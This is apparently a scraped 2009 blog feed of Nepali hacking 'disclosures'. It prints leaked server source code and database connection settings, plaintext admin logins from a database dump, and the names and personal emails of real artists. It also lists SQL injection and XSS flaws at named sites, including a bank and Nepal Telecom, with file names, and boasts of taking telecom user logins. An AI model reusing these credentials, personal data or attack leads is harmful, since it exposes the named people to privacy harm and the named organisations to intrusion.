script kiddes. This post is the message to the government bodies to secure their site...<br /><br /><br /><br />Below are sample PHP snippets from Can.gov.np<br /><br /><br /><br />From index.php<br /><br /><?<br /><br />//session_start();<br /><br />include "admin/dbconn.php";<br /><br />//Global.php gets language setting and returns $SEL_LANGUAGE=en or np<br /><br />include "global.php";<br /><br />//Parameters depending on Language settings<br /><br />include "myvar.php";<br /><br />include "removetags.php";<br /><br />?><br /><br /><br /><br />From one of the scripts(not disclosed to prevent script kiddies)<br /><br />$queryParent="select $THE_SEC from tblsections where secid=$secid and attrib='P'";<br /><br /> $resultParent=mysql_query($queryParent);<br /><br /> $rowParent=mysql_fetch_row($resultParent);<br /><br /> $secName=$rowParent[0];<br /><br /> //Get Section Content<br /><br /> $queryParent="select $SEC_CONTENT from $ContentTable where secid=$secid and attrib='P' order by contentdate desc";<br /><br /> $resultParent=mysql_query($queryParent);<br /><br /> $rowParent=mysql_fetch_row($resultParent);<br /><br /> $secContent=str_replace("THE_ANT_SINGLE_QUOTE","'",$rowParent[0]);<br /><br /> $secContent=str_replace("opensection.secid:","**editedByMe**",$secContent);<br /><br /> <br /><br />From dbconn.php<br /><br /><?<br /><br />/*<br /><br />$datahost = "localhost";<br /><br />$dbusername = "root";<br /><br />$dbuserpass = "";<br /><br />$database = "can_gov_np";<br /><br />*/<br /><br /><br /><br />$datahost = "127.0.0.1";<br /><br />$dbusername = "can";<br /><br />$dbuserpass = "**EDITED**";<br /><br />$database = "can_gov_np";<br /><br /><br /><br /><br /><br />// Database Server Connection<br /><br /> $link = mysql_connect("$datahost", "$dbusername", "$dbuserpass")<br /><br /> or die("Could not connect : " . mysql_error());<br /><br /> // print "Connected successfully <br>";<br /><br />// Database Connection<br /><br /> mysql_select_db("$database") or die("Could not select database");<br /><br /> // print "Database Selected successfully <br>";<br /><br /><br /><br />?><br /><br /><br />Thanks for reading this...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4633494586852218215?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com0tag:blogger.com,1999:blog-3339723251203762129.post-24847647208182012632009-10-31T21:45:00.000-07:002009-10-31T21:45:28.849-07:00CyberSansar Database DisclosureNot much important here (is old one) but still thought to share these. You know cybersansar.com is one of the most visited sites from Nepal and still its vulnerable to SQLi and XSS. They need to learn codings. Anyway today I am going to show you some old DB dumps of cybersansar.com (I think most of these are still the same at present, too.)<br />Lets start:<br /><br /><b>Cyber Sansar virtual host info</b>:<br /><br />####cybersansar.com<br /><virtualhost 202.79.32.62:80=""><br />ServerAdmin webmaster@cybersansar.com<br />DocumentRoot /web/vhosts/cybernepal.com.np/httpdocs<br />ServerName cybersansar.com<br />ServerAlias www.cybersansar.com<br /><br />##PHP / phpmyadmin<br />php_value register_globals "on"<br />Include /etc/apache/modules.d/vhosts_modphp<br />Include /etc/apache/modules.d/vhosts_phpmyadmin<br /><br />## htpasswd<br />Include /etc/apache/extra/cybernepal_include<br /><br /><br />## ReWrite Module<br />RewriteEngine on<br />RewriteCond %{HTTP_HOST} !^202.79.32.62(:80)?$<br />RewriteCond %{HTTP_HOST} !^www.cybersansar.com(:80)?$<br />RewriteRule ^/(.*) http://www.cybersansar.com/$1 [L,R]<br />RewriteOptions inherit<br />RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)<br />RewriteRule .* - [F]<br /><br />ErrorLog /web/vhosts/cybernepal.com.np/logs/error.log<br />CustomLog /web/vhosts/cybernepal.com.np/logs/access.log common<br /><br /></virtualhost><br /><br /><b>DB Dumps</b>:<br />INSERT INTO `logonuser` VALUES ('cardb', 'ptcn');<br />INSERT INTO `logonuser` VALUES ('admin', 'rajendra1');<br /><br /><b>Emails of artists</b>:<br />Manoj Shrestha: manoz@manozshrestha.com<br />Nalina Chitrakar: nalina_chitrakar@hotmail.com<br />Girish: diseezgirish@hotmail.com<br />Pramod Upadhyaya: cabbageheart@hotmail.com<br />Sarisma Amatya: sarishmaamatya@hotmail.com<br />Deepesh Kishor Bhattarai: deepeshforever@hotmail.com<br />Prem Lama: lamaprem_7@hotmail.com<br />Avinash Ghishing: generation_np@hotmail.com<br />Sabin Rai: mesabin03@yahoo.com<br />Prashna Shakya: prashnas@gmail.com<br />Mausami Gurung: mausamigurung4@yahoo.com<br />Abhaya Subba: bacchus_21@yahoo.com<br />Sudin Pokhrel: itsda69@hotmail.com<br />Mingma Sherpa: feelmingma@hotmail.com<br />Resma Sunuwar: resmires@hotmail.com<br /><br />I just selected few of them from DB. There were more... Also, the DB dump revealed phone numbers of around 116 singers/artists. Do not contact me to send you the phone numbers of the singers unless you have some genuine reason (hardcore fan, need to give me proof).<br /><br /><b>Tables in CyberSansar's DB</b>:<br />adminlogin<br />artist_info<br />artist_info2<br />cs_adminuser<br />cs_menucategory<br />cs_model_info<br />cs_section<br />cs_wallpaper<br />discography<br />doc_ques_ans<br />doc_sub<br />logers<br />logonuser<br />org_para<br />phpwebgallery_caddie<br />phpwebgallery_categories<br />phpwebgallery_comments<br />phpwebgallery_config<br />phpwebgallery_favorites<br />phpwebgallery_group_access<br />phpwebgallery_groups<br />phpwebgallery_history<br />phpwebgallery_image_category<br />phpwebgallery_image_tag<br />phpwebgallery_images<br />phpwebgallery_rate<br />phpwebgallery_search<br />phpwebgallery_sessions<br />phpwebgallery_sites<br />phpwebgallery_tags<br />phpwebgallery_upgrade<br />phpwebgallery_user_access<br />phpwebgallery_user_cache<br />phpwebgallery_user_feed<br />phpwebgallery_user_group<br />phpwebgallery_user_infos<br />phpwebgallery_user_mail_notification<br />phpwebgallery_users<br />phpwebgallery_waiting<br />regis<br />tbl_movie_artist_profile<br />tbl_movie_person<br />tbl_movie_persontype<br />tbl_movie_profilesetup<br />test1<br />test2<br />vdb_artist_info<br />vdb_discography<br />vdb_music_category<br />vdb_video_info<br /><br />So that's the end of the show... Feeling sleepy (its 12:23 AM already). Bye guys.<br />Thanks and Happy Hacking!!! :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-2484764720818201263?l=nepsecvulns.blogspot.com' alt='' /></div>Cool Samarhttp://www.blogger.com/profile/12279896812645182956noreply@blogger.com5tag:blogger.com,1999:blog-3339723251203762129.post-72482234578804229032009-10-27T04:12:00.000-07:002009-10-27T04:56:35.922-07:00IOE, Pulchowk website SQLi vulnerability<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_R7J4rokcecI/Subfa-GGm7I/AAAAAAAAAAc/GuTf1uegoNU/s1600-h/Screenshot-2.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 195px;" src="http://2.bp.blogspot.com/_R7J4rokcecI/Subfa-GGm7I/AAAAAAAAAAc/GuTf1uegoNU/s320/Screenshot-2.png" alt="" id="BLOGGER_PHOTO_ID_5397246857888308146" border="0" /></a><br /><span style="font-weight: bold;">IOE.edu.np SQLi vulnerability</span>:<br /><br /><span style="font-weight: bold;">Site</span>: www.ioe.edu.np<br /><span style="font-weight: bold;">Risk</span>: Low[I just did it quickly and seems there's no critical data in the site]<br /><span style="font-weight: bold;">Notified</span>: NO<br />/*Action from Admin: N/A*/<br /><span style="font-weight: bold;">Vulnerable file</span>: You should figure it out easily<br /><span style="font-weight: bold;">Exploit</span>: The php script do not validate the inputs from user which can be used to compromise the database.<br /><span style="font-weight: bold;">Solution</span>: sam207 has written an article on it.<br /><br />Just added this one to show how our security is? We don't care or we don't know how to...<br />Thank you.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-7248223457880422903?l=nepsecvulns.blogspot.com' alt='' /></div>learn3r aka cyb3r lordhttp://www.blogger.com/profile/08049135959513279608noreply@blogger.com3tag:blogger.com,1999:blog-3339723251203762129.post-49042919296236732022009-10-27T03:48:00.000-07:002009-10-27T03:51:20.521-07:00Enasha SQLi vulnerability<span style="font-weight: bold;">Enasha.com SQLi vulnerability</span>:<br /><br /><span style="font-weight: bold;">Site</span>: www.enasha.com<br /><span style="font-weight: bold;">Risk</span>: Medium - High<br /><span style="font-weight: bold;">Notified</span>: YES<br /><span style="font-weight: bold;">Action from Admin</span>: N/A<br /><span style="font-weight: bold;">Vulnerable file</span>: Admins, check email<br /><span style="font-weight: bold;">Exploit</span>: The different pages do not validate the inputs from user which can be used to compromise the database.<br /><span style="font-weight: bold;">Solution</span>: sam207 has written an article on it.<br /><br />Sample screenshot:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_R7J4rokcecI/SubQVWniXcI/AAAAAAAAAAU/9j0P5Y1s_SE/s1600-h/Screenshot-1.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 128px;" src="http://4.bp.blogspot.com/_R7J4rokcecI/SubQVWniXcI/AAAAAAAAAAU/9j0P5Y1s_SE/s320/Screenshot-1.png" alt="" id="BLOGGER_PHOTO_ID_5397230268717358530" border="0" /></a>See the title of the site...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4904291929623673202?l=nepsecvulns.blogspot.com' alt='' /></div>learn3r aka cyb3r lordhttp://www.blogger.com/profile/08049135959513279608noreply@blogger.com1tag:blogger.com,1999:blog-3339723251203762129.post-74693086766085949712009-10-27T03:21:00.000-07:002009-10-27T03:32:50.706-07:00Laxmibank.com XSS/SQLi vulnerability<span style="font-weight: bold;">Laxmi Bank XSS/SQLi vulnerability</span>:<br /><br /><span style="font-weight: bold;">Site</span>: www.laxmibank.com<br /><span style="font-weight: bold;">Risk</span>: Medium - High<br /><span style="font-weight: bold;">Notified</span>: YES<br /><span style="font-weight: bold;">Action from Admin</span>: N/A<br /><span style="font-weight: bold;">Vulnerable file</span>: searchpage.asp<br /><span style="font-weight: bold;">Exploit</span>: The search doesn't sanitize the input from user. So it suffers from XSS. And moreover specially crafted SQL queries can be done through search box<br /><span style="font-weight: bold;">Solution</span>: sam207 has written an article on it.<br /><br />Note that we have notified Laxmi Bank about this long time ago but they didn't give us any reply or didn't update themselves.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-7469308676608594971?l=nepsecvulns.blogspot.com' alt='' /></div>learn3r aka cyb3r lordhttp://www.blogger.com/profile/08049135959513279608noreply@blogger.com1tag:blogger.com,1999:blog-3339723251203762129.post-23363805969072604352009-10-27T03:04:00.000-07:002009-10-27T03:21:15.690-07:00Nepal Telecom XSS vulnerability<span style="font-weight: bold;">Nepal Telecom XSS vulnerability</span>:<br /><br /><span style="font-weight: bold;">Site</span>: www.ntc.net.np<br /><span style="font-weight: bold;">Risk</span>: Low<br /><span style="font-weight: bold;">Notified</span>: YES<br /><span style="font-weight: bold;">Action from Admin</span>: N/A<br /><span style="font-weight: bold;">Vulnerable file</span>: /search/searchresult.php<br /><span style="font-weight: bold;">Exploit</span>: The search doesn't sanitize the input from user. So it suffers from XSS.<br /><span style="font-weight: bold;">Solution</span>: sam207 has written an article on it.<br /><br />More message to NTC, you are open to a lot of problems. We got all the PSTN Bank user logins(we also know where to login from) and what's the point of putting phpinfo() online. We grabbed the PHP information from NTC. Also, why would you like to put apache manual on the website (though isn't a potential risk). Contact us if you want to know more vulnerabilities I think I shouldn't discuss over here.<br />Thank you.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-2336380596907260435?l=nepsecvulns.blogspot.com' alt='' /></div>learn3r aka cyb3r lordhttp://www.blogger.com/profile/08049135959513279608noreply@blogger.com2tag:blogger.com,1999:blog-3339723251203762129.post-34694315422549226902009-10-27T02:43:00.000-07:002009-10-27T02:55:55.770-07:00Madhavnepal.com SQLi vulnerability<span style="font-weight: bold;">MadhavNepal.com SQLi vulnerability</span>:<br /><br />Site: www.madhavnepal.com<br />Risk: Low-Medium [you need to find admin panel and MySQL<5]<br />Notified: YES<br />Action from siteadmin: N/A<br />Vulnerable file: large_tasbir.php<br />Exploit: large_tasbir.php doesnot filter the id variable passed to it.<br />Example: We know so we don't post...<br />Solution: sam207 has written an article on it.<br /><br />Sample screenshot:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_R7J4rokcecI/SubDFwpAftI/AAAAAAAAAAM/gqCqQtZPMAE/s1600-h/Screenshot.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 202px;" src="http://4.bp.blogspot.com/_R7J4rokcecI/SubDFwpAftI/AAAAAAAAAAM/gqCqQtZPMAE/s320/Screenshot.png" alt="" id="BLOGGER_PHOTO_ID_5397215707173781202" border="0" /></a><br /><br />Note that the site administrator has been notified with this vulnerability. Thank you.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-3469431542254922690?l=nepsecvulns.blogspot.com' alt='' /></div>learn3r aka cyb3r lordhttp://www.blogger.com/profile/08049135959513279608noreply@blogger.com1